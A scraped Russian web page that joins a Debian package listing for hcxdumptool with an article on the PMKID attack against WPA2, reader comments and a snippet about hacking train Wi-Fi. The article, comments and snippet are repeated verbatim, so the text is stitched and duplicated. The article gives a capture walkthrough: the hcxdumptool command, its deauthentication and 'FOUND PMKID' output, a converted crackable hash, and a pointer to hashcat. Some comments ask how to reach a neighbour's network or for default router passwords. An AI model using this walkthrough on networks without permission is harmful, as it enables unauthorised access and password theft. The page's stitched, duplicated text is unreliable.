Как установить hcxdumptool на linux
Tool to capture wpa handshake from Wi-Fi networks and run several tests to determine if Wi-Fi access points or clients are vulnerable to brute-force atacks.
Другие пакеты, относящиеся к hcxdumptool
- зависимости
- рекомендации
- предложения
- enhances
- dep: libc6 (>= 2.15) [не alpha, arm64, ia64, ppc64el, riscv64, sh4, x32] библиотека GNU C: динамически подключаемые библиотеки
также виртуальный пакет, предоставляемый libc6-udeb dep: libc6 (>= 2.16) [x32] dep: libc6 (>= 2.17) [arm64, ppc64el] dep: libc6 (>= 2.27) [riscv64] dep: libc6 (>= 2.32) [sh4] - dep: libc6.1 (>= 2.15) [alpha] библиотека GNU C: динамически подключаемые библиотеки
также виртуальный пакет, предоставляемый libc6.1-udeb dep: libc6.1 (>= 2.32) [ia64] - dep: libssl1.1 (>= 1.1.1) инструментарий Secure Sockets Layer — разделяемые библиотеки
Загрузка hcxdumptool
Архитектура | Размер пакета | В установленном виде | Файлы |
---|---|---|---|
alpha (неофициальный перенос) | 129,5 Кб | 330,0 Кб | [список файлов] |
amd64 | 106,9 Кб | 241,0 Кб | [список файлов] |
arm64 | 99,9 Кб | 233,0 Кб | [список файлов] |
armel | 105,3 Кб | 239,0 Кб | [список файлов] |
armhf | 105,3 Кб | 203,0 Кб | [список файлов] |
hppa (неофициальный перенос) | 102,7 Кб | 253,0 Кб | [список файлов] |
i386 | 102,0 Кб | 255,0 Кб | [список файлов] |
ia64 (неофициальный перенос) | 129,4 Кб | 431,0 Кб | [список файлов] |
m68k (неофициальный перенос) | 94,2 Кб | 247,0 Кб | [список файлов] |
mips64el | 100,3 Кб | 271,0 Кб | [список файлов] |
mipsel | 103,7 Кб | 260,0 Кб | [список файлов] |
ppc64 (неофициальный перенос) | 104,1 Кб | 369,0 Кб | [список файлов] |
ppc64el | 106,4 Кб | 369,0 Кб | [список файлов] |
riscv64 (неофициальный перенос) | 101,0 Кб | 210,0 Кб | [список файлов] |
s390x | 96,1 Кб | 241,0 Кб | [список файлов] |
sh4 (неофициальный перенос) | 115,6 Кб | 223,0 Кб | [список файлов] |
sparc64 (неофициальный перенос) | 98,5 Кб | 270,0 Кб | [список файлов] |
x32 (неофициальный перенос) | 106,4 Кб | 231,0 Кб | [список файлов] |
Эта страница также доступна на следующих языках (Как установить язык по умолчанию):
Авторские права © 1997 - 2021 SPI Inc.; См. условия лицензии. Debian это торговый знак компании SPI Inc. Об этом сайте.
Участниками проекта hashcat обнаружен новый вектор атаки на беспроводной стандарт WPA2, не требующий классического перехвата "рукопожатия" между клиентом и точкой доступа. Данная уязвимость выявлена в рамках исследования потенциальных проблем безопасности нового протокола WPA3.
Основное отличие от существующих атак заключается в том, что в этой атаке захват полного 4-стороннего рукопожатия EAPOL не требуется. Новая атака выполняется в RSN IE (Robust Security Network Information Element), и для ее успешного воспроизведения достаточно одного кадра EAPOL.
В настоящее время не известно, для какого количества маршрутизаторов этот метод будет работать, — вероятнее всего, для всех существующих сетей 802.11i /p/q/r с включенными функциями роуминга, а это большинство современных маршрутизаторов.
Основные особенности новой атаки:
- нет необходимости ждать клиентов — атакуется напрямую AP;
- нет необходимости ждать полного 4-стороннего «рукопожатия» между клиентом и AP;
- отсутствие ретрансмиссии кадров EAPOL;
- исключает вероятность захвата неверных паролей от клиента;
- исключены потери кадров EAPOL при отдалении/потери связи с клиентом;
- высокая скорость, обусловленная отсутствием необходимости фиксировать значения nonce и replaycounter;
- нет необходимости в специализированном формате выходных данных (pcap, hccapx и т. д.) — захваченные данные хранятся в виде hex-строки.
RSN IE — это необязательное поле, которое можно найти в рамках управления 802.11. Одной из возможностей RSN является PMKID.
PMKID вычисляется с использованием HMAC-SHA1, где ключ является PMK, а часть данных представляет собой конкатенацию фиксированной строковой метки «PMK Name», MAC-адрес точки доступа и MAC-адрес станции.
Поскольку PMK такой же, как в обычном четырехстороннем рукопожатии EAPOL, это идеальный вектор атаки. Мы получаем все необходимые данные в первом кадре EAPOL из AP.
Для атаки потребуются следующие инструменты (актуальные версии):
Запускаем hcxdumptool для "снятия" PMKID:
Об успешном завершении атаки (средняя продолжительность 10 минут) уведомит надпись FOUND PMKID:
После чего необходимо сконвертировать полученные данные:
которые после конвертации примут следующий вид:
представляющие из себя hex-значения следующих типов данных:
Далее остается "скормить" полученные результаты утилите hashcat (да, без брута пока никуда) и ждать результат:
Данная техника значительно упрощает и ускоряет атаку на большинство беспроводных устройств благодаря меньшему количеству факторов влияния.
Участниками проекта hashcat обнаружен новый вектор атаки на беспроводной стандарт WPA2, не требующий классического перехвата "рукопожатия" доступа клиент-точка. Данная уязвимость выявлена в рамках исследования потенциальных проблем безопасности нового протокола WPA3.
Основное отличие от существующих атак заключается в том, что в этой атаке захват полного 4-стороннего рукопожатия EAPOL не требуется. Новая атака выполняется в RSN IE (Robust Security Network Information Element), и для ее успешного воспроизведения достаточно одного кадра EAPOL.
В настоящее время не известно, для какого количества маршрутизаторов этот метод будет работать, — вероятнее всего, для всех существующих сетей 802.11i /p/q/r с включенными функциями роуминга, а это большинство современных маршрутизаторов.
Основные особенности новой атаки:
нет необходимости ждать клиентов — атакуется напрямую AP;
отсутствие ретрансмиссии кадров EAPOL;
исключает вероятность захвата неверных паролей от клиента;
исключены потери кадров EAPOL при отдалении/потери связи с клиентом;
высокая скорость, обусловленная отсутствием необходимости фиксировать значения nonce и replaycounter;
нет необходимости в специализированном формате выходных данных (pcap, hccapx и т. д.) — захваченные данные хранятся в виде hex-строки.
RSN IE — это необязательное поле, которое можно найти в рамках управления 802.11. Одной из возможностей RSN является PMKID.
Поскольку PMK такой же, как в обычном четырехстороннем рукопожатии EAPOL, это идеальный вектор атаки. Мы получаем все необходимые данные в первом кадре EAPOL из AP.
Для атаки потребуются следующие инструменты (актуальные версии):
Запускаем hcxdumptool для "снятия" PMKID:
$ ./hcxdumptool -o test.pcapng -i wlp39s0f3u4u5 --enable_status
start capturing (stop with ctrl+c)
INTERFACE. wlp39s0f3u4u5
FILTERLIST. 0 entries
MAC CLIENT. 89acf0e761f4 (client)
MAC ACCESS POINT. 4604ba734d4e (start NIC)
EAPOL TIMEOUT. 20000
DEAUTHENTICATIONINTERVALL: 10 beacons
GIVE UP DEAUTHENTICATIONS: 20 tries
REPLAYCOUNTER. 62083
ANONCE. 9ddca61888470946305b27d413a28cf474f19ff64c71667e5c1aee144cd70a69
Об успешном завершении атаки (средняя продолжительность 10 минут) уведомит надпись FOUND PMKID:
[13:29:57 - 011] 89acf0e761f4 -> 4604ba734d4e <ESSID> [ASSOCIATIONREQUEST, SEQUENCE 4]
[13:29:57 - 011] 4604ba734d4e -> 89acf0e761f4 [ASSOCIATIONRESPONSE, SEQUENCE 1206]
[13:29:57 - 011] 4604ba734d4e -> 89acf0e761f4 [FOUND PMKID]
После чего необходимо сконвертировать полученные данные:
start reading from test.pcapng
summary:
--------
file name. test.pcapng
file type. pcapng 1.0
file hardware information. x86_64
file os information. Linux 4.17.11-arch1
file application information.: hcxdumptool 4.2.0
network type. DLT_IEEE802_11_RADIO (127)
endianess. little endian
read errors. flawless
packets inside. 66
skipped packets. 0
packets with FCS. 0
beacons (with ESSID inside). 17
probe requests. 1
probe responses. 11
association requests. 5
association responses. 5
authentications (OPEN SYSTEM): 13
authentications (BROADCOM). 1
EAPOL packets. 14
EAPOL PMKIDs. 1
1 PMKID(s) written to test.16800
которые после конвертации примут следующий вид:
2582a8281bf9d4308d6f5731d0e61c61*4604ba734d4e*89acf0e761f4*ed487162465a774bfba60eb603a39f3a
представляющие из себя hex-значения следующих типов данных:
Далее остается "скормить" полученные результаты утилите hashcat (да, без брута пока никуда) и ждать результат:
Данная техника значительно упрощает и ускоряет атаку на большинство беспроводных устройств благодаря меньшему количеству факторов влияния.
Клиента на точке поймать просто, а вот подобрать пароль например в 16 символов это доооолго.
Так, блэт. Проще объясните как к соседу подключаться теперь.
Я нихрена не понял но знатно охренел. Теперь любой мамкин хакер способен? Так чтоли?
Белый снег, белый песец - нифига не понятно: время для реального подбора пароля сколько (пароль устойчив для атаки по словарю).
Тс, попроси модератора в сообщество информационная безопасность перенестиНапишите пароли мгтс gpon, которые ставят настройщики по дефолту.
О, есть досуг на вечер!
Один хрен в быту подустанешь перебирать.
Пардон, а можно состряпать под винду или это тупо?
Когда было скучно в "Сапсане"
Пользователь решил выяснить, насколько трудной получить к ней доступ. Оказалось, для этого достаточно просканировать сеть и использовать пару публичных экплоитов.
После этого Keklick1337 зашёл в cAdvisor — утилиту для мониторинга ресурсов и удивился показателям. Оперативная память сервера была загружена на 96% — вероятно, из-за этого он и глючил.
"Все, кто подключен к их WiFi подвержены снифу трафика, ибо всё идёт через их прокси, можно легко собирать HTTP трафик, но если чуть постараться, то и HTTPS (проверенно). К данным пассажиров рейса получить доступ не составляет труда, и занимает это от силы 20 минут".
Редакция TJ обратилась к РЖД за комментарием по ситуации, но пока не получила ответа.
Участниками проекта hashcat обнаружен новый вектор атаки на беспроводной стандарт WPA2, не требующий классического перехвата "рукопожатия" доступа клиент-точка. Данная уязвимость выявлена в рамках исследования потенциальных проблем безопасности нового протокола WPA3.
Основное отличие от существующих атак заключается в том, что в этой атаке захват полного 4-стороннего рукопожатия EAPOL не требуется. Новая атака выполняется в RSN IE (Robust Security Network Information Element), и для ее успешного воспроизведения достаточно одного кадра EAPOL.
В настоящее время не известно, для какого количества маршрутизаторов этот метод будет работать, — вероятнее всего, для всех существующих сетей 802.11i /p/q/r с включенными функциями роуминга, а это большинство современных маршрутизаторов.
Основные особенности новой атаки:
нет необходимости ждать клиентов — атакуется напрямую AP;
отсутствие ретрансмиссии кадров EAPOL;
исключает вероятность захвата неверных паролей от клиента;
исключены потери кадров EAPOL при отдалении/потери связи с клиентом;
высокая скорость, обусловленная отсутствием необходимости фиксировать значения nonce и replaycounter;
нет необходимости в специализированном формате выходных данных (pcap, hccapx и т. д.) — захваченные данные хранятся в виде hex-строки.
RSN IE — это необязательное поле, которое можно найти в рамках управления 802.11. Одной из возможностей RSN является PMKID.
Поскольку PMK такой же, как в обычном четырехстороннем рукопожатии EAPOL, это идеальный вектор атаки. Мы получаем все необходимые данные в первом кадре EAPOL из AP.
Для атаки потребуются следующие инструменты (актуальные версии):
Запускаем hcxdumptool для "снятия" PMKID:
$ ./hcxdumptool -o test.pcapng -i wlp39s0f3u4u5 --enable_status
start capturing (stop with ctrl+c)
INTERFACE. wlp39s0f3u4u5
FILTERLIST. 0 entries
MAC CLIENT. 89acf0e761f4 (client)
MAC ACCESS POINT. 4604ba734d4e (start NIC)
EAPOL TIMEOUT. 20000
DEAUTHENTICATIONINTERVALL: 10 beacons
GIVE UP DEAUTHENTICATIONS: 20 tries
REPLAYCOUNTER. 62083
ANONCE. 9ddca61888470946305b27d413a28cf474f19ff64c71667e5c1aee144cd70a69
Об успешном завершении атаки (средняя продолжительность 10 минут) уведомит надпись FOUND PMKID:
[13:29:57 - 011] 89acf0e761f4 -> 4604ba734d4e <ESSID> [ASSOCIATIONREQUEST, SEQUENCE 4]
[13:29:57 - 011] 4604ba734d4e -> 89acf0e761f4 [ASSOCIATIONRESPONSE, SEQUENCE 1206]
[13:29:57 - 011] 4604ba734d4e -> 89acf0e761f4 [FOUND PMKID]
После чего необходимо сконвертировать полученные данные:
start reading from test.pcapng
summary:
--------
file name. test.pcapng
file type. pcapng 1.0
file hardware information. x86_64
file os information. Linux 4.17.11-arch1
file application information.: hcxdumptool 4.2.0
network type. DLT_IEEE802_11_RADIO (127)
endianess. little endian
read errors. flawless
packets inside. 66
skipped packets. 0
packets with FCS. 0
beacons (with ESSID inside). 17
probe requests. 1
probe responses. 11
association requests. 5
association responses. 5
authentications (OPEN SYSTEM): 13
authentications (BROADCOM). 1
EAPOL packets. 14
EAPOL PMKIDs. 1
1 PMKID(s) written to test.16800
которые после конвертации примут следующий вид:
2582a8281bf9d4308d6f5731d0e61c61*4604ba734d4e*89acf0e761f4*ed487162465a774bfba60eb603a39f3a
представляющие из себя hex-значения следующих типов данных:
Далее остается "скормить" полученные результаты утилите hashcat (да, без брута пока никуда) и ждать результат:
Данная техника значительно упрощает и ускоряет атаку на большинство беспроводных устройств благодаря меньшему количеству факторов влияния.
Клиента на точке поймать просто, а вот подобрать пароль например в 16 символов это доооолго.
Так, блэт. Проще объясните как к соседу подключаться теперь.
Я нихрена не понял но знатно охренел. Теперь любой мамкин хакер способен? Так чтоли?
Белый снег, белый песец - нифига не понятно: время для реального подбора пароля сколько (пароль устойчив для атаки по словарю).
Тс, попроси модератора в сообщество информационная безопасность перенестиНапишите пароли мгтс gpon, которые ставят настройщики по дефолту.
О, есть досуг на вечер!
Один хрен в быту подустанешь перебирать.
Пардон, а можно состряпать под винду или это тупо?
Когда было скучно в "Сапсане"
Пользователь решил выяснить, насколько трудной получить к ней доступ. Оказалось, для этого достаточно просканировать сеть и использовать пару публичных экплоитов.
После этого Keklick1337 зашёл в cAdvisor — утилиту для мониторинга ресурсов и удивился показателям. Оперативная память сервера была загружена на 96% — вероятно, из-за этого он и глючил.
"Все, кто подключен к их WiFi подвержены снифу трафика, ибо всё идёт через их прокси, можно легко собирать HTTP трафик, но если чуть постараться, то и HTTPS (проверенно). К данным пассажиров рейса получить доступ не составляет труда, и занимает это от силы 20 минут".
Редакция TJ обратилась к РЖД за комментарием по ситуации, но пока не получила ответа.
Читайте также: